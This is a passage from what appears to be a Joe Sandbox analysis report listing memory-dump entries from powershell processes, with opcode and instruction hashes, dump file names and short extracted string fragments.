                                                  • Instruction ID: c6efffb084c3c46dbe104e0c5247f79e37b278c99efb0831acab3348fb31638d
                                                  • Opcode Fuzzy Hash: ba3e296f9e4fc9d3af6739ea4d829e10b7570a386eaefa58d89823000cec81f8
                                                  • Instruction Fuzzy Hash: FC81287061CA498FE789EF1CC495BB5B7E1EF99311B1045BED08EC32A6DA25F846C780
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1918875732.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaacda0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7bf8108a925ed829926d0fc80c66b1ddfc7f5fbbfe977198b512a270a28c539b
                                                  • Instruction ID: 58bb952250b91fe5b1fd7f697c68197d9fc060f6907ba8ea17ecc0d4e34136f9
                                                  • Opcode Fuzzy Hash: 7bf8108a925ed829926d0fc80c66b1ddfc7f5fbbfe977198b512a270a28c539b
                                                  • Instruction Fuzzy Hash: 395136A2B1FA868FF795D72888515B9BED1EF86720B5851BAD06DC31D3DE18DC088381
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1918875732.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaacda0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9edcec21ba24a8e287700c21f70cd2a276771c83aa13d39f36b2e63fc3fe4e6b
                                                  • Instruction ID: ba53e56f6112c7a065e6433b45dbf63593b17438b26517fa4d66886c0d976687
                                                  • Opcode Fuzzy Hash: 9edcec21ba24a8e287700c21f70cd2a276771c83aa13d39f36b2e63fc3fe4e6b
                                                  • Instruction Fuzzy Hash: B831F892F1FE8A8FFA65976858151787AD1AF46A20B5809BAD06DC30D3FE4CA80842C1
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1917776699.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaaccd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                  • Instruction ID: 2e2ae42c124f45b8248b17c802c13fba615db4093582208906ef6c5616fc3453
                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                  • Instruction Fuzzy Hash: B501447111CB088FD744EF0CE455AA5B7E0FB99364F10056EE58AC3661D626E892CB45
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1917776699.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaaccd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8,8$P/8$p08$-8$/8
                                                  • API String ID: 0-3573041664
                                                  • Opcode ID: 8836a8fa079be3b6cbe0574690ac3687743f6620024b963507a28e9cf72a9422
                                                  • Instruction ID: 1027eed3cd107ff1157b8712ba523d784f0c661191789dd2c294384a14e33224
                                                  • Opcode Fuzzy Hash: 8836a8fa079be3b6cbe0574690ac3687743f6620024b963507a28e9cf72a9422
                                                  • Instruction Fuzzy Hash: A7317C8680F7C19FF3178BA818252796FA0AF4360171980FBE08C8F9DB94499D4DC3D6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \V3k
                                                  • API String ID: 0-3869630692
                                                  • Opcode ID: e794f53ec41d6ea62d4709f617df73d9defe8674fc44a5787c7155798f0582b4
                                                  • Instruction ID: 6185347eb1df6d4e2fb410b27fbb852e50a62a3ae8e1b15386f4afa6fc1b9225
                                                  • Opcode Fuzzy Hash: e794f53ec41d6ea62d4709f617df73d9defe8674fc44a5787c7155798f0582b4
                                                  • Instruction Fuzzy Hash: 68B15E70E00219DFDB24CFA9C8857AEBBF2BF88705F148529E815A7395EB74A845CF41
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 494c334f071c4fd50ab23074c5ef79cee2b254d935c4d8a51a990538b7969499
                                                  • Instruction ID: 6e0fc5c1bc9a2ae230f3697e8e1dbc952bdf138ef1d98bbb3010bc3de10734f5
                                                  • Opcode Fuzzy Hash: 494c334f071c4fd50ab23074c5ef79cee2b254d935c4d8a51a990538b7969499
                                                  • Instruction Fuzzy Hash: ADB17D70E00309CFDB24CFA9D98179DBBF2AF88355F148529E815EB395EB74A841CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                                  • API String ID: 0-4027085306
                                                  • Opcode ID: f8c1d800e4d55f4855f144a3fecc47d820f7a216e6eb58fca0cee56463b80e4c
                                                  • Instruction ID: 43633dfbb98097b215b9d145874c0a25ea5db229733eb3a6e0a30b1c5e3eb9ae
                                                  • Opcode Fuzzy Hash: f8c1d800e4d55f4855f144a3fecc47d820f7a216e6eb58fca0cee56463b80e4c
                                                  • Instruction Fuzzy Hash: 367204B5B00306AFDB249B68D5426EEBBF2BF89210F14847BD8059B755CB31DC46CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
                                                  • API String ID: 0-663938088
                                                  • Opcode ID: 764a4a1cf0d0788000108a760dfbc98709a2ea8a267f527346b8ebd55dd29b58
                                                  • Instruction ID: 82e43ed3cf005f5c1403f067083b00dcb5859a1d0a7f02c99efd17ea690e5c5d
                                                  • Opcode Fuzzy Hash: 764a4a1cf0d0788000108a760dfbc98709a2ea8a267f527346b8ebd55dd29b58
                                                  • Instruction Fuzzy Hash: 046262B4A002199FDB64DF54C950BDDBBB2BF85344F1084E9DA096B781CB31AE82CF95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq
                                                  • API String ID: 0-3075684691
                                                  • Opcode ID: d25c66c1aa146bedc2c94b3d4e634809caff4054130b99816073a3686a0f20b8
                                                  • Instruction ID: 6f523328d5309cda6cabac7fee30962b6bb414a7590481fbd7bce26108bc30db
                                                  • Opcode Fuzzy Hash: d25c66c1aa146bedc2c94b3d4e634809caff4054130b99816073a3686a0f20b8
                                                  • Instruction Fuzzy Hash: 3F9290B4A00315EFDB24CB54C950BAEBBB2FF85310F1489AAD9099B745DB31EC46CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8N3k$Hq$h]3k$h]3k$h]3k$$q$$q$I3k
                                                  • API String ID: 0-2631099303
                                                  • Opcode ID: 095ce15126ff553a6f1d1315f69f11f8181f62b24f1e70d627aac762110bf4a1
                                                  • Instruction ID: 9da4fa14b189da1df702c4f6fceb3bdc00277096637edad20d644964c82076ba
                                                  • Opcode Fuzzy Hash: 095ce15126ff553a6f1d1315f69f11f8181f62b24f1e70d627aac762110bf4a1
                                                  • Instruction Fuzzy Hash: 1F224034B002188FDB25DB64C8557AEB7F2BF89305F1444A9D84AAB362DF35AD85CF81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                                                  • API String ID: 0-1794337482
                                                  • Opcode ID: baa5c1b5903f577ab8708e6845d7a5c284f683586416b9f8033e532aba4c2dc3
                                                  • Instruction ID: d454316d5b4c08d65b808d08bf04282ae2dbb95394a24eb0007d5c9619d28786
                                                  • Opcode Fuzzy Hash: baa5c1b5903f577ab8708e6845d7a5c284f683586416b9f8033e532aba4c2dc3
                                                  • Instruction Fuzzy Hash: 62D1AEB4E10205AFEB28DB64C550BDEBBA2BBC8340F10C869D9156F395CB75EC428B95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$$q$$q$$q$$q
                                                  • API String ID: 0-1538229613
                                                  • Opcode ID: e71735a2234dda6df32389684208bdc501a1151682746b7e7d33001c8de9dcf0
                                                  • Instruction ID: 00b11b3fdd83d492272d43e9215a7b3b63ae3317dfc16d76bc07f0f5ee8d369f
                                                  • Opcode Fuzzy Hash: e71735a2234dda6df32389684208bdc501a1151682746b7e7d33001c8de9dcf0
                                                  • Instruction Fuzzy Hash: 11B129B1B24206AFEB248B65D4417EEBBA1FFC5250F14847BD90D8B2D1EA31D845C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$$q$$q$$q
                                                  • API String ID: 0-170447905
                                                  • Opcode ID: 93bd6f6fc3898d8ef2de3fbc130bbc57633a5178202e3479da5a0c377ab586ed
                                                  • Instruction ID: 28b819432c2e9405d444dcc423583d2dfa47fac4e40bbd63703603f5a810439f
                                                  • Opcode Fuzzy Hash: 93bd6f6fc3898d8ef2de3fbc130bbc57633a5178202e3479da5a0c377ab586ed
                                                  • Instruction Fuzzy Hash: 795127B1704206BFCB658B65D8126EEBBF1BFC6211F1984BBD8058B252C631C842C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q
                                                  • API String ID: 0-3126650252
                                                  • Opcode ID: 703861ac6161ce1615de68958e6bdab5f27d5101331371a877a05bf85647415d
                                                  • Instruction ID: 7b266311173ad5375b77307ab9253bf729d25573bd83ed218fadd8978a90486c
                                                  • Opcode Fuzzy Hash: 703861ac6161ce1615de68958e6bdab5f27d5101331371a877a05bf85647415d
                                                  • Instruction Fuzzy Hash: A1B19CB4A00205AFDB24CF54C590BDEBBB2BB88344F15C86AD9056F395CB35EC46CB51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tPq$tPq
                                                  • API String ID: 0-4270251778
                                                  • Opcode ID: 5a87013b750f780e84edfd708b8a9f41131563549a3411654be3463beda28e80
                                                  • Instruction ID: b319dcd93924812c2f98703af2ca2ef243c4df44e1d8cdf70a065ee9de7a5311
                                                  • Opcode Fuzzy Hash: 5a87013b750f780e84edfd708b8a9f41131563549a3411654be3463beda28e80
                                                  • Instruction Fuzzy Hash: 6102D5B4B00245AFDB249BA8C550BAEBBE2BF85340F14C46AD9155F791CB71EC42CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q
                                                  • API String ID: 0-1467158625
                                                  • Opcode ID: 0ad23be99c7efa5cda1ec96a6e8f62d690367a442bda00a8fcbfe903c82c954a
                                                  • Instruction ID: f598581197f556f11d6f70f3f611beeeba53189668a652b27685215abdbbdc80
                                                  • Opcode Fuzzy Hash: 0ad23be99c7efa5cda1ec96a6e8f62d690367a442bda00a8fcbfe903c82c954a
                                                  • Instruction Fuzzy Hash: AF025FB4A00219DFEB24DB54C950BDDB7B2BB84300F10C5E5DA19AB781CB71AE82CF95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q
                                                  • API String ID: 0-1467158625
                                                  • Opcode ID: cbea9eba85b67161cb7a9e5185686df074a359383aa378914cbfe118c6c9cd44
                                                  • Instruction ID: 5ba7d8c018f4305f679e239b503798d9946364bc3efc47898391802480103da8
                                                  • Opcode Fuzzy Hash: cbea9eba85b67161cb7a9e5185686df074a359383aa378914cbfe118c6c9cd44
                                                  • Instruction Fuzzy Hash: A2F19DB0A00215DFEB24DB14C950B9EBBB2FB88344F54C4A9D9096B795CB71ED82CF51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q
                                                  • API String ID: 0-1467158625
                                                  • Opcode ID: 9c013ebc4511c499a150a84e4a304cd4bfdef48cf2b7505690ff2faa52595f65
                                                  • Instruction ID: 06e50a4732564f35fe7a956e8734d0e3445012643e1ce39b1423decf075e5a7b
                                                  • Opcode Fuzzy Hash: 9c013ebc4511c499a150a84e4a304cd4bfdef48cf2b7505690ff2faa52595f65
                                                  • Instruction Fuzzy Hash: 51E186B4A00218AFE724DF64CD54B9E7BB2BB84340F1084A9DA099F791CB75ED428F95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q
                                                  • API String ID: 0-3126353813
                                                  • Opcode ID: 36061b60ebb369c5194c1034bf43acc254f1d8bc7267032a65f9f51780ae2e55
                                                  • Instruction ID: 1c995499843f55239cd1caeffe5835a083c0622bd8be36224cde746d2b5cdc7b
                                                  • Opcode Fuzzy Hash: 36061b60ebb369c5194c1034bf43acc254f1d8bc7267032a65f9f51780ae2e55
                                                  • Instruction Fuzzy Hash: 8F1198B5315286EFD7258B14D841AE97B75FBC2318B198077D9088B1D1E732C805C751
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \V3k
                                                  • API String ID: 0-3869630692
                                                  • Opcode ID: 52075b2c0818ba17a89660e20c59544e2731eb2f5d1e8eb809480c3770aabb44
                                                  • Instruction ID: d6b3a12ad1d387c318b3f5753e2ed0bd42de631e85090ade33d5a0d5d121ea51
                                                  • Opcode Fuzzy Hash: 52075b2c0818ba17a89660e20c59544e2731eb2f5d1e8eb809480c3770aabb44
                                                  • Instruction Fuzzy Hash: 50B15D70E00219DFDB20CFA9D8857AEBBF2BF48705F148529E815A7395EB34A845CF81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tPq
                                                  • API String ID: 0-789928099
                                                  • Opcode ID: 4300d74f70dff54c3302970bd90df2171485d57db8c7ed6fb7f363a5ea35b62b
                                                  • Instruction ID: a591702ba977068ff74fe559f5e53fc47fc5ef1c52b0817cbe2f263f27eb7513
                                                  • Opcode Fuzzy Hash: 4300d74f70dff54c3302970bd90df2171485d57db8c7ed6fb7f363a5ea35b62b
                                                  • Instruction Fuzzy Hash: DE51C0B0A09385AFC712CB64D851A99BFB1BF46208F1A84EBD444CF293C735DC45C7A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q
                                                  • API String ID: 0-1807707664
                                                  • Opcode ID: 3646f4b2e4dabe3b8189e6ddf161c67ed9491f7d421e082ebe9643f5171ebb2d
                                                  • Instruction ID: ce5e7a10806abdeb8abd0572dace08a3ce8c715627f8c05ab14e3ff88a142f59
                                                  • Opcode Fuzzy Hash: 3646f4b2e4dabe3b8189e6ddf161c67ed9491f7d421e082ebe9643f5171ebb2d
                                                  • Instruction Fuzzy Hash: AE21F5F5B00212EBDB245A2485037FEBAA2BFC4250F14447BC9159B381DB36E94687E1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q
                                                  • API String ID: 0-1807707664
                                                  • Opcode ID: dc49a89997f228c83046913fdba1315a229140e9147947b76be7551238f0d7fc
                                                  • Instruction ID: a1c6cf45c11eeca0e49c3f3c741268fa1d6a9981cfabee92ffc3dae39da91f24
                                                  • Opcode Fuzzy Hash: dc49a89997f228c83046913fdba1315a229140e9147947b76be7551238f0d7fc
                                                  • Instruction Fuzzy Hash: 942105F0B00222BBDB245A6485037FEBAA2BFC4340F54447BD9149B380DB36E84687E2
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 684c0ac8edc527cc290d3edc1d074276a9db2e805909d8f5a7fafa277bd6d5f1
                                                  • Instruction ID: 3f6257f03c62cc87a8f9b38cdd975cee1edb352698750d5aa952822f4aaca550
                                                  • Opcode Fuzzy Hash: 684c0ac8edc527cc290d3edc1d074276a9db2e805909d8f5a7fafa277bd6d5f1
                                                  • Instruction Fuzzy Hash: 77626AB4B00215EFDB24CB98C550E9EBBB2BB88304F25C46AD9099F755DB72EC46CB41
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bb936c90e2e550383aeac6ec7fa37d696fd8c10ce5d66e5379e1f56cc0f018d8
                                                  • Instruction ID: 0331425976194173a3b21afc1578b41207b9bac2b62288b343540393a28e5af4
                                                  • Opcode Fuzzy Hash: bb936c90e2e550383aeac6ec7fa37d696fd8c10ce5d66e5379e1f56cc0f018d8
                                                  • Instruction Fuzzy Hash: 7E3248B4A00215EFDB24CF98C540E9EBBB2BB84314F25C4AAD9099F756D772EC46CB41
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ee19e0ab5620e3e191e4f3a85d1b4a3b47faaf2226c5644aa259419e9eae3262
                                                  • Instruction ID: e38787535468c48971c6bca23458120edc47cb572aa06545d9e71a70cffd8b00
                                                  • Opcode Fuzzy Hash: ee19e0ab5620e3e191e4f3a85d1b4a3b47faaf2226c5644aa259419e9eae3262
                                                  • Instruction Fuzzy Hash: 8C125AB4A00215EFDB24CF94C550E9EBBB2BB84304F25C4AAE9099F756D772EC46CB41
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cc5d9da85ef2f44c10e0fc396ea002754cbb6ec4fedd00228b7e9a00c927cf3f
                                                  • Instruction ID: 5168a3177e8388f7130add9245b0ffed921df21aa1f78bcfe0cf0301adca11b3
                                                  • Opcode Fuzzy Hash: cc5d9da85ef2f44c10e0fc396ea002754cbb6ec4fedd00228b7e9a00c927cf3f
                                                  • Instruction Fuzzy Hash: CAD1F574E01249EFDB15CFA8D484A9DFBB2BF48315F248159E804AB362C735ED86CB90
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9810c13e51b0209627dc5d532f1d481e0d1aec2acc848a8377e4d451d1d290aa
                                                  • Instruction ID: 4f6e87f3efe353a44d0542568e57db926ede0897ff37e082deea9d6703a95f05
                                                  • Opcode Fuzzy Hash: 9810c13e51b0209627dc5d532f1d481e0d1aec2acc848a8377e4d451d1d290aa
                                                  • Instruction Fuzzy Hash: 98A19C75A00209DFDB14EFA4C984A9DBBF2FF84305F118558E802AB366DB74AC49DB81
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b53043a912b93043e275431aa79a0acd3115b91006d521decfbf1ae31a6db903
                                                  • Instruction ID: ddafcf33d33405b381c8545911793f85091b81bc10a8986279c8b1009592a425
                                                  • Opcode Fuzzy Hash: b53043a912b93043e275431aa79a0acd3115b91006d521decfbf1ae31a6db903
                                                  • Instruction Fuzzy Hash: BAB15C70E00209DFDB20CFA9D9857DDBBF1AF48355F248529E814AB395EB74A885CB81
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c21e76e1ffb2853c9a51d406be1598824ab622e4d97d3f4edabe6e68e4f7012
                                                  • Instruction ID: 3d0107bbb1cd9a7983b301ae0e95b7e354ea9338000c7a90a4ace04faaf9a76b
                                                  • Opcode Fuzzy Hash: 4c21e76e1ffb2853c9a51d406be1598824ab622e4d97d3f4edabe6e68e4f7012
                                                  • Instruction Fuzzy Hash: 0B91E134A05204DFCB14DFA8D844AADBBF2FF89315F158969E441AB362CB35EC86CB51
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4ac2f7b2a3dea44ce33ae73a361e80015fc95371dc65ca9a0f6e95192a8f8396
                                                  • Instruction ID: 13417b866a521936c56feb689c156de3fe855816170eb3baa596638042ed6f39
                                                  • Opcode Fuzzy Hash: 4ac2f7b2a3dea44ce33ae73a361e80015fc95371dc65ca9a0f6e95192a8f8396
                                                  • Instruction Fuzzy Hash: 77918E74A006058FCB15CF59C494AAEFBB1FF89310B248599E855EB3A6C735FC91CBA0
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 42b94ef991fd9a8cc4bfcdbbe27a97e61d01acb024ab30b3248d9b8d9f2087c5
                                                  • Instruction ID: ab4e0ed75a9b0ecd52a8d2774fd390763973f0c388565e154b8abeeee8a89dae
                                                  • Opcode Fuzzy Hash: 42b94ef991fd9a8cc4bfcdbbe27a97e61d01acb024ab30b3248d9b8d9f2087c5
                                                  • Instruction Fuzzy Hash: F4814AB8A00245EFDB14CF58D582ADDBBB2BF89314F14886AD905AB351C732EC42CF61
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d7a19788ed9fab7d112cc715b4e3e6fcb0efca1185444b1c8af43bcfda89cfe8
                                                  • Instruction ID: cdcf5bee73df33f269ba199daf2e8f25957d8705d2983dda07c468fba4c72801
                                                  • Opcode Fuzzy Hash: d7a19788ed9fab7d112cc715b4e3e6fcb0efca1185444b1c8af43bcfda89cfe8
                                                  • Instruction Fuzzy Hash: 32813AB8A00245EFDB14CF58D586A9DBBB2BF88314F14C46AD905AB351C732EC42CF61
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a8b65c12d837520e8f3327bf7e0130e87ed6bd9093d7b8cc51cf2af579a0c62c
                                                  • Instruction ID: 5ded83858862999d6a7f6969e5e832f47951427af69ca8314eba2f872ce4a99e
